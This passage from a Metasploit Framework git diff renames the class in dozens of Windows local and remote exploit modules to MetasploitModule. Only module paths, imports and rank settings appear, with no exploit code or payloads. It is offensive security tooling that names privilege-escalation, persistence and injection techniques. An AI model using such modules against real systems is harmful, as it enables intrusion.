Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ipass_launch_app.rb b/modules/exploits/windows/local/ipass_launch_app.rb index 1a49cb233d..566b014ddf 100644 --- a/modules/exploits/windows/local/ipass_launch_app.rb +++ b/modules/exploits/windows/local/ipass_launch_app.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb index 35e5fe61b1..1eeeb00c31 100644 --- a/modules/exploits/windows/local/lenovo_systemupdate.rb +++ b/modules/exploits/windows/local/lenovo_systemupdate.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb index 024fb55adc..8938107475 100644 --- a/modules/exploits/windows/local/mqac_write.rb +++ b/modules/exploits/windows/local/mqac_write.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index 8145b65278..351038ada4 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/exploit/exe' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index dc91903f4b..407161bcf0 100644 --- a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -8,7 +8,7 @@ require 'rex' require 'zlib' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 662481af63..f058484caf 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking # Average because this module relies on memory corruption within the # kernel, this is inherently dangerous. Also if the payload casues diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb index 8729306125..c8a04ce87c 100644 --- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb +++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 8d647f7a8d..3900bcd413 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb index 7095e49f9e..1113a98ddf 100644 --- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index de49e4a47d..dae1068507 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index a4d5236714..62d6b47a1d 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb index 2908ef555f..6e84605d84 100644 --- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb index d1430d6bab..e1eb99561c 100644 --- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb +++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms15_004_tswbproxy.rb b/modules/exploits/windows/local/ms15_004_tswbproxy.rb index a8cf36d104..1d78cc08f4 100644 --- a/modules/exploits/windows/local/ms15_004_tswbproxy.rb +++ b/modules/exploits/windows/local/ms15_004_tswbproxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb index afa42a0dcd..eae20ef784 100644 --- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb +++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb index e78ff63d46..76dbcb4529 100644 --- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb +++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking WIN32K_VERSIONS = [ diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index dfa59f4b35..441ee622ba 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb index 97b5f6d5b6..48e194aefb 100644 --- a/modules/exploits/windows/local/novell_client_nicm.rb +++ b/modules/exploits/windows/local/novell_client_nicm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb index e68b7eb646..9a2ef1896d 100644 --- a/modules/exploits/windows/local/novell_client_nwfs.rb +++ b/modules/exploits/windows/local/novell_client_nwfs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/ntapphelpcachecontrol.rb b/modules/exploits/windows/local/ntapphelpcachecontrol.rb index a0269a72b3..5550173d86 100644 --- a/modules/exploits/windows/local/ntapphelpcachecontrol.rb +++ b/modules/exploits/windows/local/ntapphelpcachecontrol.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index eaab094978..97c19714e1 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -11,7 +11,7 @@ require 'msf/core/post/windows/process' require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/post/windows/services' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 8648ea1dac..28b51ccb19 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Windows::Process diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index d719b37e3a..ff010ea276 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -11,7 +11,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/windows/registry' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking diff --git a/modules/exploits/windows/local/powershell_cmd_upgrade.rb b/modules/exploits/windows/local/powershell_cmd_upgrade.rb index 8a8b4bc1bc..b3258d5b41 100644 --- a/modules/exploits/windows/local/powershell_cmd_upgrade.rb +++ b/modules/exploits/windows/local/powershell_cmd_upgrade.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb index 30ad2442b7..ac63c1c122 100644 --- a/modules/exploits/windows/local/powershell_remoting.rb +++ b/modules/exploits/windows/local/powershell_remoting.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb index 9bf0d99c53..9ec2c9df0b 100644 --- a/modules/exploits/windows/local/ppr_flatten_rec.rb +++ b/modules/exploits/windows/local/ppr_flatten_rec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/pxeexploit.rb b/modules/exploits/windows/local/pxeexploit.rb index 5830e98536..746a8bdc81 100644 --- a/modules/exploits/windows/local/pxeexploit.rb +++ b/modules/exploits/windows/local/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::TFTPServer diff --git a/modules/exploits/windows/local/registry_persistence.rb b/modules/exploits/windows/local/registry_persistence.rb index 6efe4a89dc..77dc63224d 100644 --- a/modules/exploits/windows/local/registry_persistence.rb +++ b/modules/exploits/windows/local/registry_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/run_as.rb b/modules/exploits/windows/local/run_as.rb index 122e0262f3..27d43d5cb9 100644 --- a/modules/exploits/windows/local/run_as.rb +++ b/modules/exploits/windows/local/run_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local include Msf::Post::Windows::Runas include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 40a4dc77e1..75282e68fe 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index 5f182feb70..6d80118ba9 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index dcea5907f9..9ac1b902f0 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/virtual_box_guest_additions.rb b/modules/exploits/windows/local/virtual_box_guest_additions.rb index fc78d7e63f..0f4af645c4 100644 --- a/modules/exploits/windows/local/virtual_box_guest_additions.rb +++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb index 22a5db2c6e..5aa74dbfa1 100644 --- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb +++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking DEVICE = '\\\\.\\VBoxGuest' diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb index f02c1e5a6c..ae7a9a89ed 100644 --- a/modules/exploits/windows/local/vss_persistence.rb +++ b/modules/exploits/windows/local/vss_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index 3f6a75d772..a57469af53 100644 --- a/modules/exploits/windows/local/wmi.rb +++ b/modules/exploits/windows/local/wmi.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index c806bb71d6..d7aa39f5d0 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index f5876e4d5e..15c6f3465b 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index f86f06cf09..0152389d2e 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb index 95cc18d40f..c81eba5b73 100644 --- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb +++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # needs client interaction and permanent listener # diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 2696dfd9cf..783fc8ec7c 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 56f7267fc3..aa57ae65e4 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index c41eccb25d..e370868b86 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index ee2d364df6..6e5354b7e5 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/achat_bof.rb b/modules/exploits/windows/misc/achat_bof.rb index 7a53dee238..378dcd3d7a 100644 --- a/modules/exploits/windows/misc/achat_bof.rb +++ b/modules/exploits/windows/misc/achat_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb index 2cf6fd756e..970804766e 100644 --- a/modules/exploits/windows/misc/actfax_raw_server_bof.rb +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking diff --git a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb index 8fcdb9e6d8..64aa24d4a0 100644 --- a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb +++ b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/allmediaserver_bof.rb b/modules/exploits/windows/misc/allmediaserver_bof.rb index 0d02343531..2ecd64761c 100644 --- a/modules/exploits/windows/misc/allmediaserver_bof.rb +++ b/modules/exploits/windows/misc/allmediaserver_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 383d1e5503..5d41f38d8d 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index dfa2e33ca2..a18abfeb57 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index 5f4aaf27a6..ef8ca5f737 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb index 70c5c32675..163488bdd5 100644 --- a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb +++ b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/avidphoneticindexer.rb b/modules/exploits/windows/misc/avidphoneticindexer.rb index d61bc8c168..b73941ecee 100644 --- a/modules/exploits/windows/misc/avidphoneticindexer.rb +++ b/modules/exploits/windows/misc/avidphoneticindexer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index f7ef75924e..33623a6a2e 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bcaaa_bof.rb b/modules/exploits/windows/misc/bcaaa_bof.rb index 6647a2e608..b83075517a 100644 --- a/modules/exploits/windows/misc/bcaaa_bof.rb +++ b/modules/exploits/windows/misc/bcaaa_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index a63b9bd4fa..a485c3f977 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 49e364a014..2cfbdcfe73 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index e20af52a2a..2a727d37ea 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb index 4bf8ff8fcf..e0fd894ab6 100644 --- a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb +++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index 9db3b25a2f..fa53f1bdc9 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index 1bc230ad4c..55a2bb646b 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index 2f5d35ae39..c792582b39 100644 --- 